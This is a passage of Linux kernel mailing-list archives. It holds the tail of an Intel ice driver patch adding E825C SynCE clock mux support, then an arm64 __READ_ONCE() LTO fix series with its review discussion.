ice_pf *pf) mutex_destroy(&d->lock); dev_warn(ice_pf_to_dev(pf), "DPLLs init failure err:%d\n", err); } + +void ice_dpll_init(struct ice_pf *pf) +{ + switch (pf->hw.mac_type) { + case ICE_MAC_GENERIC_3K_E825: + ice_dpll_init_e825(pf); + break; + default: + ice_dpll_init_e810(pf); + break; + } +} diff --git a/drivers/net/ethernet/intel/ice/ice_dpll.h b/drivers/net/ethernet/intel/ice/ice_dpll.h index 63fac6510df6e..ae42cdea0ee14 100644 --- a/drivers/net/ethernet/intel/ice/ice_dpll.h +++ b/drivers/net/ethernet/intel/ice/ice_dpll.h @@ -20,6 +20,12 @@ enum ice_dpll_pin_sw { ICE_DPLL_PIN_SW_NUM }; +struct ice_dpll_pin_work { + struct work_struct work; + unsigned long action; + struct ice_dpll_pin *pin; +}; + /** ice_dpll_pin - store info about pins * @pin: dpll pin structure * @pf: pointer to pf, which has registered the dpll_pin @@ -39,6 +45,8 @@ struct ice_dpll_pin { struct dpll_pin 
*pin; struct ice_pf *pf; dpll_tracker tracker; + struct fwnode_handle *fwnode; + struct notifier_block nb; u8 idx; u8 num_parents; u8 parent_idx[ICE_DPLL_RCLK_NUM_MAX]; @@ -118,7 +126,9 @@ struct ice_dpll { struct ice_dplls { struct kthread_worker *kworker; struct kthread_delayed_work work; + struct workqueue_struct *wq; struct mutex lock; + struct completion dpll_init; struct ice_dpll eec; struct ice_dpll pps; struct ice_dpll_pin *inputs; @@ -147,3 +157,19 @@ static inline void ice_dpll_deinit(struct ice_pf *pf) { } #endif #endif + +#define ICE_CGU_R10 0x28 +#define ICE_CGU_R10_SYNCE_CLKO_SEL GENMASK(8, 5) +#define ICE_CGU_R10_SYNCE_CLKODIV_M1 GENMASK(13, 9) +#define ICE_CGU_R10_SYNCE_CLKODIV_LOAD BIT(14) +#define ICE_CGU_R10_SYNCE_DCK_RST BIT(15) +#define ICE_CGU_R10_SYNCE_ETHCLKO_SEL GENMASK(18, 16) +#define ICE_CGU_R10_SYNCE_ETHDIV_M1 GENMASK(23, 19) +#define ICE_CGU_R10_SYNCE_ETHDIV_LOAD BIT(24) +#define ICE_CGU_R10_SYNCE_DCK2_RST BIT(25) +#define ICE_CGU_R10_SYNCE_S_REF_CLK GENMASK(31, 27) + +#define ICE_CGU_R11 0x2C +#define ICE_CGU_R11_SYNCE_S_BYP_CLK GENMASK(6, 1) + +#define ICE_CGU_BYPASS_MUX_OFFSET_E825C 3 diff --git a/drivers/net/ethernet/intel/ice/ice_lib.c b/drivers/net/ethernet/intel/ice/ice_lib.c index 2522ebdea9139..d921269e1fe71 100644 --- a/drivers/net/ethernet/intel/ice/ice_lib.c +++ b/drivers/net/ethernet/intel/ice/ice_lib.c @@ -3989,6 +3989,9 @@ void ice_init_feature_support(struct ice_pf *pf) break; } + if (pf->hw.mac_type == ICE_MAC_GENERIC_3K_E825) + ice_set_feature_support(pf, ICE_F_PHY_RCLK); + if (pf->hw.mac_type == ICE_MAC_E830) { ice_set_feature_support(pf, ICE_F_MBX_LIMIT); ice_set_feature_support(pf, ICE_F_GCS); diff --git a/drivers/net/ethernet/intel/ice/ice_ptp.c b/drivers/net/ethernet/intel/ice/ice_ptp.c index 4c8d20f2d2c0a..1d26be58e29a0 100644 --- a/drivers/net/ethernet/intel/ice/ice_ptp.c +++ b/drivers/net/ethernet/intel/ice/ice_ptp.c @@ -1341,6 +1341,38 @@ void ice_ptp_link_change(struct ice_pf *pf, bool linkup) if 
(pf->hw.reset_ongoing) return; + if (hw->mac_type == ICE_MAC_GENERIC_3K_E825) { + int pin, err; + + if (!test_bit(ICE_FLAG_DPLL, pf->flags)) + return; + + mutex_lock(&pf->dplls.lock); + for (pin = 0; pin < ICE_SYNCE_CLK_NUM; pin++) { + enum ice_synce_clk clk_pin; + bool active; + u8 port_num; + + port_num = ptp_port->port_num; + clk_pin = (enum ice_synce_clk)pin; + err = ice_tspll_bypass_mux_active_e825c(hw, + port_num, + &active, + clk_pin); + if (WARN_ON_ONCE(err)) { + mutex_unlock(&pf->dplls.lock); + return; + } + + err = ice_tspll_cfg_synce_ethdiv_e825c(hw, clk_pin); + if (active && WARN_ON_ONCE(err)) { + mutex_unlock(&pf->dplls.lock); + return; + } + } + mutex_unlock(&pf->dplls.lock); + } + switch (hw->mac_type) { case ICE_MAC_E810: case ICE_MAC_E830: diff --git a/drivers/net/ethernet/intel/ice/ice_ptp_hw.c b/drivers/net/ethernet/intel/ice/ice_ptp_hw.c index 35680dbe4a7f7..61c0a0d93ea89 100644 --- a/drivers/net/ethernet/intel/ice/ice_ptp_hw.c +++ b/drivers/net/ethernet/intel/ice/ice_ptp_hw.c @@ -5903,7 +5903,14 @@ int ice_get_cgu_rclk_pin_info(struct ice_hw *hw, u8 *base_idx, u8 *pin_num) *base_idx = SI_REF1P; else ret = -ENODEV; - + break; + case ICE_DEV_ID_E825C_BACKPLANE: + case ICE_DEV_ID_E825C_QSFP: + case ICE_DEV_ID_E825C_SFP: + case ICE_DEV_ID_E825C_SGMII: + *pin_num = ICE_SYNCE_CLK_NUM; + *base_idx = 0; + ret = 0; break; default: ret = -ENODEV; diff --git a/drivers/net/ethernet/intel/ice/ice_tspll.c b/drivers/net/ethernet/intel/ice/ice_tspll.c index 66320a4ab86fd..fd4b58eb9bc00 100644 --- a/drivers/net/ethernet/intel/ice/ice_tspll.c +++ b/drivers/net/ethernet/intel/ice/ice_tspll.c @@ -624,3 +624,220 @@ int ice_tspll_init(struct ice_hw *hw) return err; } + +/** + * ice_tspll_bypass_mux_active_e825c - check if the given port is set active + * @hw: Pointer to the HW struct + * @port: Number of the port + * @active: Output flag showing if port is active + * @output: Output pin, we have two in E825C + * + * Check if given port is selected as recovered clock 
source for given output. + * + * Return: + * * 0 - success + * * negative - error + */ +int ice_tspll_bypass_mux_active_e825c(struct ice_hw *hw, u8 port, bool *active, + enum ice_synce_clk output) +{ + u8 active_clk; + u32 val; + int err; + + switch (output) { + case ICE_SYNCE_CLK0: + err = ice_read_cgu_reg(hw, ICE_CGU_R10, &val); + if (err) + return err; + active_clk = FIELD_GET(ICE_CGU_R10_SYNCE_S_REF_CLK, val); + break; + case ICE_SYNCE_CLK1: + err = ice_read_cgu_reg(hw, ICE_CGU_R11, &val); + if (err) + return err; + active_clk = FIELD_GET(ICE_CGU_R11_SYNCE_S_BYP_CLK, val); + break; + default: + return -EINVAL; + } + + if (active_clk == port % hw->ptp.ports_per_phy + + ICE_CGU_BYPASS_MUX_OFFSET_E825C) + *active = true; + else + *active = false; + + return 0; +} + +/** + * ice_tspll_cfg_bypass_mux_e825c - configure reference clock mux + * @hw: Pointer to the HW struct + * @ena: true to enable the reference, false if disable + * @port_num: Number of the port + * @output: Output pin, we have two in E825C + * + * Set reference clock source and output clock selection. 
+ * + * Context: Called under pf->dplls.lock + * Return: + * * 0 - success + * * negative - error + */ +int ice_tspll_cfg_bypass_mux_e825c(struct ice_hw *hw, bool ena, u32 port_num, + enum ice_synce_clk output) +{ + u8 first_mux; + int err; + u32 r10; + + err = ice_read_cgu_reg(hw, ICE_CGU_R10, &r10); + if (err) + return err; + + if (!ena) + first_mux = ICE_CGU_NET_REF_CLK0; + else + first_mux = port_num + ICE_CGU_BYPASS_MUX_OFFSET_E825C; + + r10 &= ~(ICE_CGU_R10_SYNCE_DCK_RST | ICE_CGU_R10_SYNCE_DCK2_RST); + + switch (output) { + case ICE_SYNCE_CLK0: + r10 &= ~(ICE_CGU_R10_SYNCE_ETHCLKO_SEL | + ICE_CGU_R10_SYNCE_ETHDIV_LOAD | + ICE_CGU_R10_SYNCE_S_REF_CLK); + r10 |= FIELD_PREP(ICE_CGU_R10_SYNCE_S_REF_CLK, first_mux); + r10 |= FIELD_PREP(ICE_CGU_R10_SYNCE_ETHCLKO_SEL, + ICE_CGU_REF_CLK_BYP0_DIV); + break; + case ICE_SYNCE_CLK1: + { + u32 val; + + err = ice_read_cgu_reg(hw, ICE_CGU_R11, &val); + if (err) + return err; + val &= ~ICE_CGU_R11_SYNCE_S_BYP_CLK; + val |= FIELD_PREP(ICE_CGU_R11_SYNCE_S_BYP_CLK, first_mux); + err = ice_write_cgu_reg(hw, ICE_CGU_R11, val); + if (err) + return err; + r10 &= ~(ICE_CGU_R10_SYNCE_CLKODIV_LOAD | + ICE_CGU_R10_SYNCE_CLKO_SEL); + r10 |= FIELD_PREP(ICE_CGU_R10_SYNCE_CLKO_SEL, + ICE_CGU_REF_CLK_BYP1_DIV); + break; + } + default: + return -EINVAL; + } + + err = ice_write_cgu_reg(hw, ICE_CGU_R10, r10); + if (err) + return err; + + return 0; +} + +/** + * ice_tspll_get_div_e825c - get the divider for the given speed + * @link_speed: link speed of the port + * @divider: output value, calculated divider + * + * Get CGU divider value based on the link speed. 
+ * + * Return: + * * 0 - success + * * negative - error + */ +static int ice_tspll_get_div_e825c(u16 link_speed, unsigned int *divider) +{ + switch (link_speed) { + case ICE_AQ_LINK_SPEED_100GB: + case ICE_AQ_LINK_SPEED_50GB: + case ICE_AQ_LINK_SPEED_25GB: + *divider = 10; + break; + case ICE_AQ_LINK_SPEED_40GB: + case ICE_AQ_LINK_SPEED_10GB: + *divider = 4; + break; + case ICE_AQ_LINK_SPEED_5GB: + case ICE_AQ_LINK_SPEED_2500MB: + case ICE_AQ_LINK_SPEED_1000MB: + *divider = 2; + break; + case ICE_AQ_LINK_SPEED_100MB: + *divider = 1; + break; + default: + return -EOPNOTSUPP; + } + + return 0; +} + +/** + * ice_tspll_cfg_synce_ethdiv_e825c - set the divider on the mux + * @hw: Pointer to the HW struct + * @output: Output pin, we have two in E825C + * + * Set the correct CGU divider for RCLKA or RCLKB. + * + * Context: Called under pf->dplls.lock + * Return: + * * 0 - success + * * negative - error + */ +int ice_tspll_cfg_synce_ethdiv_e825c(struct ice_hw *hw, + enum ice_synce_clk output) +{ + unsigned int divider; + u16 link_speed; + u32 val; + int err; + + link_speed = hw->port_info->phy.link_info.link_speed; + if (!link_speed) + return 0; + + err = ice_tspll_get_div_e825c(link_speed, &divider); + if (err) + return err; + + err = ice_read_cgu_reg(hw, ICE_CGU_R10, &val); + if (err) + return err; + + /* programmable divider value (from 2 to 16) minus 1 for ETHCLKOUT */ + switch (output) { + case ICE_SYNCE_CLK0: + val &= ~(ICE_CGU_R10_SYNCE_ETHDIV_M1 | + ICE_CGU_R10_SYNCE_ETHDIV_LOAD); + val |= FIELD_PREP(ICE_CGU_R10_SYNCE_ETHDIV_M1, divider - 1); + err = ice_write_cgu_reg(hw, ICE_CGU_R10, val); + if (err) + return err; + val |= ICE_CGU_R10_SYNCE_ETHDIV_LOAD; + break; + case ICE_SYNCE_CLK1: + val &= ~(ICE_CGU_R10_SYNCE_CLKODIV_M1 | + ICE_CGU_R10_SYNCE_CLKODIV_LOAD); + val |= FIELD_PREP(ICE_CGU_R10_SYNCE_CLKODIV_M1, divider - 1); + err = ice_write_cgu_reg(hw, ICE_CGU_R10, val); + if (err) + return err; + val |= ICE_CGU_R10_SYNCE_CLKODIV_LOAD; + break; + default: + 
return -EINVAL; + } + + err = ice_write_cgu_reg(hw, ICE_CGU_R10, val); + if (err) + return err; + + return 0; +} diff --git a/drivers/net/ethernet/intel/ice/ice_tspll.h b/drivers/net/ethernet/intel/ice/ice_tspll.h index c0b1232cc07c3..d650867004d1f 100644 --- a/drivers/net/ethernet/intel/ice/ice_tspll.h +++ b/drivers/net/ethernet/intel/ice/ice_tspll.h @@ -21,11 +21,22 @@ struct ice_tspll_params_e82x { u32 frac_n_div; }; +#define ICE_CGU_NET_REF_CLK0 0x0 +#define ICE_CGU_REF_CLK_BYP0 0x5 +#define ICE_CGU_REF_CLK_BYP0_DIV 0x0 +#define ICE_CGU_REF_CLK_BYP1 0x4 +#define ICE_CGU_REF_CLK_BYP1_DIV 0x1 + #define ICE_TSPLL_CK_REFCLKFREQ_E825 0x1F #define ICE_TSPLL_NDIVRATIO_E825 5 #define ICE_TSPLL_FBDIV_INTGR_E825 256 int ice_tspll_cfg_pps_out_e825c(struct ice_hw *hw, bool enable); int ice_tspll_init(struct ice_hw *hw); - +int ice_tspll_bypass_mux_active_e825c(struct ice_hw *hw, u8 port, bool *active, + enum ice_synce_clk output); +int ice_tspll_cfg_bypass_mux_e825c(struct ice_hw *hw, bool ena, u32 port_num, + enum ice_synce_clk output); +int ice_tspll_cfg_synce_ethdiv_e825c(struct ice_hw *hw, + enum ice_synce_clk output); #endif /* _ICE_TSPLL_H_ */ diff --git a/drivers/net/ethernet/intel/ice/ice_type.h b/drivers/net/ethernet/intel/ice/ice_type.h index 6a2ec8389a8f3..1e82f4c40b326 100644 --- a/drivers/net/ethernet/intel/ice/ice_type.h +++ b/drivers/net/ethernet/intel/ice/ice_type.h @@ -349,6 +349,12 @@ enum ice_clk_src { NUM_ICE_CLK_SRC }; +enum ice_synce_clk { + ICE_SYNCE_CLK0, + ICE_SYNCE_CLK1, + ICE_SYNCE_CLK_NUM +}; + struct ice_ts_func_info { /* Function specific info */ enum ice_tspll_freq time_ref; -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:38 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH v3 0/3] arm64: Fixes for __READ_ONCE() with CONFIG_LTO=y
While investigating a Clang Context Analysis [1] false positive [2], I started to dig deeper into arm64's __READ_ONCE() implementation with LTO. That rabbit hole led me to find one critical bug with the current implementation (patch 1), and subtle improvements that then enabled me to fix the original false positive. Patch 1 fixes a bug where READ_ONCE() on types larger than 8 bytes (non-atomic fallback) incorrectly qualified the pointer rather than the pointee as volatile. This resulted in a lack of "once" semantics for large struct loads. Patch 2 refactors the macro to use __rwonce_typeof_unqual() and eliminates the ternary conditional. Building on the refactor, patch 3 fixes the context analysis false positive, by helping its alias analysis "see through" the __READ_ONCE despite the inline asm. ## Note on Alternative for Patch 3 An alternative considered for the Context Analysis fix was introducing a helper function to redirect the pointer alias; specifically passing a pointer to const-pointer does not invalidate an alias either (casting away the const is a deliberate escape hatch, albeit somewhat unusual looking). This approach was slightly more verbose, so the simpler approach was chosen for now. It is preserved here for future reference in case we need it for something else: static __always_inline void __set_pointer_opaque(void *const *dst, const void *val) { *(void **)dst = (void *)val; } ... __set_pointer_opaque((void *const *)&__ret, &__u.__val); ... [1] https://docs.kernel.org/next/dev-tools/context-analysis.html [2] https://lore.kernel.org/all/202601221040.TeM0ihff-lkp@intel.com/ --- v3: * Comments-smithing. * Use 'typeof(*__ret) __val' v2: * Add __rwonce_typeof_unqual() as fallback for old compilers. 
Marco Elver (3): arm64: Fix non-atomic __READ_ONCE() with CONFIG_LTO=y arm64: Optimize __READ_ONCE() with CONFIG_LTO=y arm64, compiler-context-analysis: Permit alias analysis through __READ_ONCE() with CONFIG_LTO=y arch/arm64/include/asm/rwonce.h | 27 ++++++++++++++++++++++----- 1 file changed, 22 insertions(+), 5 deletions(-) -- 2.53.0.rc1.225.gd81095ad13-goog
The implementation of __READ_ONCE() under CONFIG_LTO=y incorrectly qualified the fallback "once" access for types larger than 8 bytes, which are not atomic but should still happen "once" and suppress common compiler optimizations. The cast `volatile typeof(__x)` applied the volatile qualifier to the pointer type itself rather than the pointee. This created a volatile pointer to a non-volatile type, which violated __READ_ONCE() semantics. Fix this by casting to `volatile typeof(*__x) *`. With a defconfig + LTO + debug options build, we see the following functions to be affected: xen_manage_runstate_time (884 -> 944 bytes) xen_steal_clock (248 -> 340 bytes) ^-- use __READ_ONCE() to load vcpu_runstate_info structs Fixes: e35123d83ee3 ("arm64: lto: Strengthen READ_ONCE() to acquire when CONFIG_LTO=y") Cc: <stable@vger.kernel.org> Reviewed-by: Boqun Feng <boqun@kernel.org> Signed-off-by: Marco Elver <elver@google.com> --- arch/arm64/include/asm/rwonce.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/arm64/include/asm/rwonce.h b/arch/arm64/include/asm/rwonce.h index 78beceec10cd..fc0fb42b0b64 100644 --- a/arch/arm64/include/asm/rwonce.h +++ b/arch/arm64/include/asm/rwonce.h @@ -58,7 +58,7 @@ default: \ atomic = 0; \ } \ - atomic ? (typeof(*__x))__u.__val : (*(volatile typeof(__x))__x);\ + atomic ? (typeof(*__x))__u.__val : (*(volatile typeof(*__x) *)__x);\ }) #endif /* !BUILD_VDSO */ -- 2.53.0.rc1.225.gd81095ad13-goog
{ "author": "Marco Elver <elver@google.com>", "date": "Fri, 30 Jan 2026 14:28:24 +0100", "thread_id": "20260130132951.2714396-1-elver@google.com.mbox.gz" }
lkml
[PATCH v3 0/3] arm64: Fixes for __READ_ONCE() with CONFIG_LTO=y
Rework arm64 LTO __READ_ONCE() to improve code generation as follows: 1. Replace _Generic-based __unqual_scalar_typeof() with more complete __rwonce_typeof_unqual(). This strips qualifiers from all types, not just integer types, which is required to be able to assign (must be non-const) to __u.__val in the non-atomic case (required for #2). Once our minimum compiler versions are bumped, this just becomes TYPEOF_UNQUAL() (or typeof_unqual() should we decide to adopt C23 naming). Sadly the fallback version of __rwonce_typeof_unqual() cannot be used as a general TYPEOF_UNQUAL() fallback (see code comments). One subtle point here is that non-integer types of __val could be const or volatile within the union with the old __unqual_scalar_typeof(), if the passed variable is const or volatile. This would then result in a forced load from the stack if __u.__val is volatile; in the case of const, it does look odd if the underlying storage changes, but the compiler is told said member is "const" -- it smells like UB. 2. Eliminate the atomic flag and ternary conditional expression. Move the fallback volatile load into the default case of the switch, ensuring __u is unconditionally initialized across all paths. The statement expression now unconditionally returns __u.__val. This refactoring appears to help the compiler improve (or fix) code generation. 
With a defconfig + LTO + debug options build, we observe different codegen for the following functions: btrfs_reclaim_sweep (708 -> 1032 bytes) btrfs_sinfo_bg_reclaim_threshold_store (200 -> 204 bytes) check_mem_access (3652 -> 3692 bytes) [inlined bpf_map_is_rdonly] console_flush_all (1268 -> 1264 bytes) console_lock_spinning_disable_and_check (180 -> 176 bytes) igb_add_filter (640 -> 636 bytes) igb_config_tx_modes (2404 -> 2400 bytes) kvm_vcpu_on_spin (480 -> 476 bytes) map_freeze (376 -> 380 bytes) netlink_bind (1664 -> 1656 bytes) nmi_cpu_backtrace (404 -> 400 bytes) set_rps_cpu (516 -> 520 bytes) swap_cluster_readahead (944 -> 932 bytes) tcp_accecn_third_ack (328 -> 336 bytes) tcp_create_openreq_child (1764 -> 1772 bytes) tcp_data_queue (5784 -> 5892 bytes) tcp_ecn_rcv_synack (620 -> 628 bytes) xen_manage_runstate_time (944 -> 896 bytes) xen_steal_clock (340 -> 296 bytes) Increases in some functions are due to more aggressive inlining enabled by better codegen (in this build, e.g. bpf_map_is_rdonly is no longer present due to being inlined completely). Signed-off-by: Marco Elver <elver@google.com> --- v3: * Comment. v2: * Add __rwonce_typeof_unqual() as fallback for old compilers. --- arch/arm64/include/asm/rwonce.h | 21 +++++++++++++++++---- 1 file changed, 17 insertions(+), 4 deletions(-) diff --git a/arch/arm64/include/asm/rwonce.h b/arch/arm64/include/asm/rwonce.h index fc0fb42b0b64..42c9e8429274 100644 --- a/arch/arm64/include/asm/rwonce.h +++ b/arch/arm64/include/asm/rwonce.h @@ -19,6 +19,20 @@ "ldapr" #sfx "\t" #regs, \ ARM64_HAS_LDAPR) +#ifdef USE_TYPEOF_UNQUAL +#define __rwonce_typeof_unqual(x) TYPEOF_UNQUAL(x) +#else +/* + * Fallback for older compilers (Clang < 19). + * + * Uses the fact that, for all supported Clang versions, 'auto' correctly drops + * qualifiers. Unlike typeof_unqual(), the type must be completely defined, i.e. + * no forward-declared struct pointer dereferences. 
The array-to-pointer decay + * case does not matter for usage in READ_ONCE() either. + */ +#define __rwonce_typeof_unqual(x) typeof(({ auto ____t = (x); ____t; })) +#endif + /* * When building with LTO, there is an increased risk of the compiler * converting an address dependency headed by a READ_ONCE() invocation @@ -32,8 +46,7 @@ #define __READ_ONCE(x) \ ({ \ typeof(&(x)) __x = &(x); \ - int atomic = 1; \ - union { __unqual_scalar_typeof(*__x) __val; char __c[1]; } __u; \ + union { __rwonce_typeof_unqual(*__x) __val; char __c[1]; } __u; \ switch (sizeof(x)) { \ case 1: \ asm volatile(__LOAD_RCPC(b, %w0, %1) \ @@ -56,9 +69,9 @@ : "Q" (*__x) : "memory"); \ break; \ default: \ - atomic = 0; \ + __u.__val = *(volatile typeof(*__x) *)__x; \ } \ - atomic ? (typeof(*__x))__u.__val : (*(volatile typeof(*__x) *)__x);\ + __u.__val; \ }) #endif /* !BUILD_VDSO */ -- 2.53.0.rc1.225.gd81095ad13-goog
{ "author": "Marco Elver <elver@google.com>", "date": "Fri, 30 Jan 2026 14:28:25 +0100", "thread_id": "20260130132951.2714396-1-elver@google.com.mbox.gz" }
lkml
[PATCH v3 0/3] arm64: Fixes for __READ_ONCE() with CONFIG_LTO=y
When enabling Clang's Context Analysis (aka. Thread Safety Analysis) on kernel/futex/core.o (see Peter's changes at [1]), in arm64 LTO builds we could see: | kernel/futex/core.c:982:1: warning: spinlock 'atomic ? __u.__val : q->lock_ptr' is still held at the end of function [-Wthread-safety-analysis] | 982 | } | | ^ | kernel/futex/core.c:976:2: note: spinlock acquired here | 976 | spin_lock(lock_ptr); | | ^ | kernel/futex/core.c:982:1: warning: expecting spinlock 'q->lock_ptr' to be held at the end of function [-Wthread-safety-analysis] | 982 | } | | ^ | kernel/futex/core.c:966:6: note: spinlock acquired here | 966 | void futex_q_lockptr_lock(struct futex_q *q) | | ^ | 2 warnings generated. Where we have: extern void futex_q_lockptr_lock(struct futex_q *q) __acquires(q->lock_ptr); .. void futex_q_lockptr_lock(struct futex_q *q) { spinlock_t *lock_ptr; /* * See futex_unqueue() why lock_ptr can change. */ guard(rcu)(); retry: spin_lock(lock_ptr); ... } At the time of the above report (prior to removal of the 'atomic' flag), Clang Thread Safety Analysis's alias analysis resolved 'lock_ptr' to 'atomic ? __u.__val : q->lock_ptr' (now just '__u.__val'), and used this as the identity of the context lock given it cannot "see through" the inline assembly; however, we want 'q->lock_ptr' as the canonical context lock. While for code generation the compiler simplified to '__u.__val' for pointers (8 byte case -> 'atomic' was set), TSA's analysis (a) happens much earlier on the AST, and (b) would be the wrong deduction. Now that we've gotten rid of the 'atomic' ternary comparison, we can return '__u.__val' through a pointer that we initialize with '&x', but then update via a pointer-to-pointer. When READ_ONCE()'ing a context lock pointer, TSA's alias analysis does not invalidate the initial alias when updated through the pointer-to-pointer, and we make it effectively "see through" the __READ_ONCE(). Code generation is unchanged. 
Link: https://lkml.kernel.org/r/20260121110704.221498346@infradead.org [1] Reported-by: kernel test robot <lkp@intel.com> Closes: https://lore.kernel.org/oe-kbuild-all/202601221040.TeM0ihff-lkp@intel.com/ Cc: Peter Zijlstra <peterz@infradead.org> Tested-by: Boqun Feng <boqun@kernel.org> Signed-off-by: Marco Elver <elver@google.com> --- v3: * Use 'typeof(*__ret)'. * Commit message. v2: * Rebase. --- arch/arm64/include/asm/rwonce.h | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/arch/arm64/include/asm/rwonce.h b/arch/arm64/include/asm/rwonce.h index 42c9e8429274..b7de74d4bf07 100644 --- a/arch/arm64/include/asm/rwonce.h +++ b/arch/arm64/include/asm/rwonce.h @@ -45,8 +45,12 @@ */ #define __READ_ONCE(x) \ ({ \ - typeof(&(x)) __x = &(x); \ - union { __rwonce_typeof_unqual(*__x) __val; char __c[1]; } __u; \ + auto __x = &(x); \ + auto __ret = (__rwonce_typeof_unqual(*__x) *)__x; \ + /* Hides alias reassignment from Clang's -Wthread-safety. */ \ + auto __retp = &__ret; \ + union { typeof(*__ret) __val; char __c[1]; } __u; \ + *__retp = &__u.__val; \ switch (sizeof(x)) { \ case 1: \ asm volatile(__LOAD_RCPC(b, %w0, %1) \ @@ -71,7 +75,7 @@ default: \ __u.__val = *(volatile typeof(*__x) *)__x; \ } \ - __u.__val; \ + *__ret; \ }) #endif /* !BUILD_VDSO */ -- 2.53.0.rc1.225.gd81095ad13-goog
{ "author": "Marco Elver <elver@google.com>", "date": "Fri, 30 Jan 2026 14:28:26 +0100", "thread_id": "20260130132951.2714396-1-elver@google.com.mbox.gz" }
lkml
[PATCH v3 0/3] arm64: Fixes for __READ_ONCE() with CONFIG_LTO=y
On Fri, 30 Jan 2026 14:28:24 +0100 Marco Elver <elver@google.com> wrote: I found this in some testing (on godbolt), so: Tested-by: David Laight <david.laight.linux@gmail.com>
{ "author": "David Laight <david.laight.linux@gmail.com>", "date": "Fri, 30 Jan 2026 15:06:58 +0000", "thread_id": "20260130132951.2714396-1-elver@google.com.mbox.gz" }
lkml
[PATCH v3 0/3] arm64: Fixes for __READ_ONCE() with CONFIG_LTO=y
On Fri, 30 Jan 2026 14:28:25 +0100 Marco Elver <elver@google.com> wrote: Having most of the comment in the commit message and a short one in the code looks good. I think it will also fix a 'bleat' from min() about a signed v unsigned compare. The ?: causes 'u8' to be promoted to 'int' with the expected outcome. Reviewed-by: David Laight <david.laight.linux@gmail.com>
{ "author": "David Laight <david.laight.linux@gmail.com>", "date": "Fri, 30 Jan 2026 15:11:30 +0000", "thread_id": "20260130132951.2714396-1-elver@google.com.mbox.gz" }
lkml
[PATCH v3 0/3] arm64: Fixes for __READ_ONCE() with CONFIG_LTO=y
On Fri, 30 Jan 2026 14:28:26 +0100 Marco Elver <elver@google.com> wrote: LGTM (for an obscure definition of G). Reviewed-by: David Laight <david.laight.linux@gmail.com>
{ "author": "David Laight <david.laight.linux@gmail.com>", "date": "Fri, 30 Jan 2026 15:13:34 +0000", "thread_id": "20260130132951.2714396-1-elver@google.com.mbox.gz" }
lkml
[PATCH v3 0/3] arm64: Fixes for __READ_ONCE() with CONFIG_LTO=y
On Fri, Jan 30, 2026 at 02:28:25PM +0100, Marco Elver wrote:

I know that CONFIG_LTO practically depends on Clang, but it's a bit grotty relying on that assumption here. Ideally, it would be straightforward to enable the strong READ_ONCE() semantics on arm64 regardless of the compiler.

Since we're not providing acquire semantics for the non-atomic case, what we really want is the generic definition of __READ_ONCE() from include/asm-generic/rwonce.h here. The header inclusion mess prevents that, but why can't we just inline that definition here for the 'default' case?

If TYPEOF_UNQUAL() leads to better codegen, shouldn't we use that to implement __unqual_scalar_typeof() when it is available?

I fear I'm missing something here, but it just feels like we're optimising a pretty niche case (arm64 + LTO + non-atomic __READ_ONCE()) in a way that looks more generally applicable.

Will
{ "author": "Will Deacon <will@kernel.org>", "date": "Mon, 2 Feb 2026 15:36:40 +0000", "thread_id": "20260130132951.2714396-1-elver@google.com.mbox.gz" }
lkml
[PATCH v3 0/3] arm64: Fixes for __READ_ONCE() with CONFIG_LTO=y
On Fri, Jan 30, 2026 at 02:28:26PM +0100, Marco Elver wrote: What does GCC do with this? :/ Will
{ "author": "Will Deacon <will@kernel.org>", "date": "Mon, 2 Feb 2026 15:39:36 +0000", "thread_id": "20260130132951.2714396-1-elver@google.com.mbox.gz" }
lkml
[PATCH v3 0/3] arm64: Fixes for __READ_ONCE() with CONFIG_LTO=y
On Mon, Feb 02, 2026 at 03:36:40PM +0000, Will Deacon wrote:

We are?

---
commit fd69b2f7d5f4e1d89cea4cdfa6f15e7fa53d8358
Author: Peter Zijlstra <peterz@infradead.org>
Date:   Fri Jan 16 19:18:16 2026 +0100

    compiler: Use __typeof_unqual__() for __unqual_scalar_typeof()

    The recent changes to get_unaligned() resulted in a new sparse warning:

      net/rds/ib_cm.c:96:35: sparse: sparse: incorrect type in argument 1 (different modifiers) @@ expected void * @@ got restricted __be64 const * @@
      net/rds/ib_cm.c:96:35: sparse: expected void *
      net/rds/ib_cm.c:96:35: sparse: got restricted __be64 const *

    The updated get_unaligned_t() uses __unqual_scalar_typeof() to get an
    unqualified type. This works correctly for the compilers, but fails for
    sparse when the data type is __be64 (or any other __beNN variant).

    On sparse runs (C=[12]) __beNN types are annotated with
    __attribute__((bitwise)). That annotation allows sparse to detect
    incompatible operations on __beNN variables, but it also prevents sparse
    from evaluating the _Generic() in __unqual_scalar_typeof() and map __beNN
    to a unqualified scalar type, so it ends up with the default, i.e. the
    original qualified type of a 'const __beNN' pointer.

    That then ends up as the first pointer argument to builtin_memcpy(),
    which obviously causes the above sparse warnings.

    The sparse git tree supports typeof_unqual() now, which allows to use it
    instead of the _Generic() based __unqual_scalar_typeof(). With that
    sparse correctly evaluates the unqualified type and keeps the __beNN
    logic intact.

    The downside is that this requires a top of tree sparse build and an old
    sparse version will emit a metric ton of incomprehensible error messages
    before it dies with a segfault. Therefore implement a sanity check which
    validates that the checker is available and capable of handling
    typeof_unqual(). Emit a warning if not so the user can take informed
    action.

    [ tglx: Move the evaluation of USE_TYPEOF_UNQUAL to compiler_types.h so
      it is set before use and implement the sanity checker ]

    Reported-by: kernel test robot <lkp@intel.com>
    Signed-off-by: Peter Zijlstra <peterz@infradead.org>
    Signed-off-by: Thomas Gleixner <tglx@kernel.org>
    Acked-by: Ian Rogers <irogers@google.com>
    Link: https://patch.msgid.link/87ecnp2zh3.ffs@tglx
    Closes: https://lore.kernel.org/oe-kbuild-all/202601150001.sKSN644a-lkp@intel.com/

diff --git a/Makefile b/Makefile
index 9d38125263fb..179c9d9a56dd 100644
--- a/Makefile
+++ b/Makefile
@@ -1187,6 +1187,14 @@ CHECKFLAGS += $(if $(CONFIG_CPU_BIG_ENDIAN),-mbig-endian,-mlittle-endian)
 # the checker needs the correct machine size
 CHECKFLAGS += $(if $(CONFIG_64BIT),-m64,-m32)
 
+# Validate the checker is available and functional
+ifneq ($(KBUILD_CHECKSRC), 0)
+  ifneq ($(shell $(srctree)/scripts/checker-valid.sh $(CHECK) $(CHECKFLAGS)), 1)
